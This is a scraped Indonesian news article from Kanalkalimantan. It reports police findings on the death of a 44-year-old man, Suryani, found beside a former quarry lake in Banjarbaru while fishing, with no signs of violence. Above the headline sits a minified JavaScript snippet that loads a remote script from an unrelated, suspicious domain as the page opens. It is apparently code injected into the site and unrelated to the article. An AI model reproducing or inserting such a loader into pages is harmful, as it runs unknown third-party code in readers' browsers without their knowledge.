(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Pergi Memancing Sejak Pagi, Suryani ‘Pulang’ dari Pinggir Danau Bekas Galian C


KANALKALIMANTAN.COM, BANJARBARU – Polsek Liang Anggang mengungkap kronologi penemuan jasad laki-laki di pinggir danau Jalan Batu Besi, Kelurahan Landasan Ulin Timur, Kecamatan Landasan Ulin, Kota Banjarbaru, Minggu (21/4/2024) siang.

Jasad lelaki itu persisnya ditemukan pertama kali oleh warga di pinggir danau bekas galian C, tergeletak dengan posisi miring ke kiri dan kedua kaki melipat sekitar pukul 13.30 Wita.

“Laki-laki diduga seorang pemancing ikan di pinggir danau Batu Besi bekas galian C, sedang tergeletak dengan posisi miring ke kiri dan kedua kaki melipat,” beber Kapolsek Liang Anggang, Kompol Yuda Kumoro Pardede, Minggu (21/4/2024) petang.

Kapolsek Liang Anggang mengatakan saksi yang pertama kali melihat mendatangi laki-laki tersebut diduga sudah dalam keadaan meninggal dunia, hingga akhirnya saksi menghubungi Ketua RT.

“Kemudian Ketua RT mendatangi tempat tersebut dan melihat seorang laki-laki dalam kondisi miring tertelungkup yang diduga sudah meninggal dunia,” sambung dia.

Baca juga: Ini Dugaan Penyebab Kematian Lelaki di Pinggir Danau Jalan Batu Besi

Kompol Kumoro Pardede menjelaskan, saat dilakukan pemeriksaan terhadap jasad di lokasi kejadian tidak ditemukan identitas diri.

Kemudian jasad laki-laki itu dibawa ke RSD Idaman Banjarbaru untuk dilakukan pengambilan sidik jari dengan menggunakan alat Inafis Portable System (IPS).

“Dari hasil pengambilan sidik jari didapati identitas dengan keakuratan 510 kredit score pada jari kanan dan jari kiri keakuratan 370 kredit score,” jelasnya.

Hasil identifikasi, identitas jasad itu diketahui bernama Suryani berusia 44 tahun, beragama Islam dengan alamat Dusun Tawangsari RT 001 RW 002 Kelurahan Kedungombo, Kecamatan Tanjunganom, Kabupaten Nganjuk, Jawa Timur.

Baca juga: Temuan Lelaki Tergeletak di Pinggir Danau Jalan Batu Besi Landasan Ulin

Kemudian polisi mendapati anggota keluarga Suryani bernama Siti Mahmudah yang tinggal di Kompoleks Griya Ulin Permai, Kelurahan Landasan Ulin Timur.

“Suryani diduga telah meninggal dunia sekitar satu jam dan tidak ditemukan ada tanda-tanda kekerasan, baik bekas senjata tajam maupun senjata tumpul,” sebutnya.

Menurut keterangan dari pihak keluarga, disebutkan Kapolsek, diduga Suryani mengalami kelelahan. Belakangan juga diketahui dari keterangan pihak keluarga, Suryani sering begadang dan kurang istirahat.

“Hari ini Suryani pergi untuk memancing dari rumah sekitar pukul 09.00 Wita, setelah sarapan dan minum kopi, hingga didapat informasi oleh keluarga bahwa Suryani telah meninggal dunia,” tuturnya.

Saat ini kata Kapolsek Liang Anggang, jenazah Suryani telah diserahkan kepada pihak keluarga untuk proses pemakaman.

Beberapa barang yang diamankan kepolisian berupa sebuah HP Oppo warna biru yang ditemukan di saku celana sebelah kiri. Uang tunai sebesar Rp77 ribu yang ditemukan di saku celana sebelah kanan.

Baca juga: Saling Serang Pakai Parang, R Tewas Penuh Darah di Kawasan Pasar Jumat Ratu Elok

Masih di lokasi pinggir danau bekas galian C juga ditemukn dua buah batang joran pancing beserta seperangkat alat pancing, satu unit sepeda motor Yamaha bernopol DA 3565 WP warna hitam yang milik korban, sebuah topi warna merah, sebungkus rokok merk PIN, serta sepasang sepatu. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

9 menit ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

2 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

3 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

4 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

4 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

6 jam ago

This website uses cookies.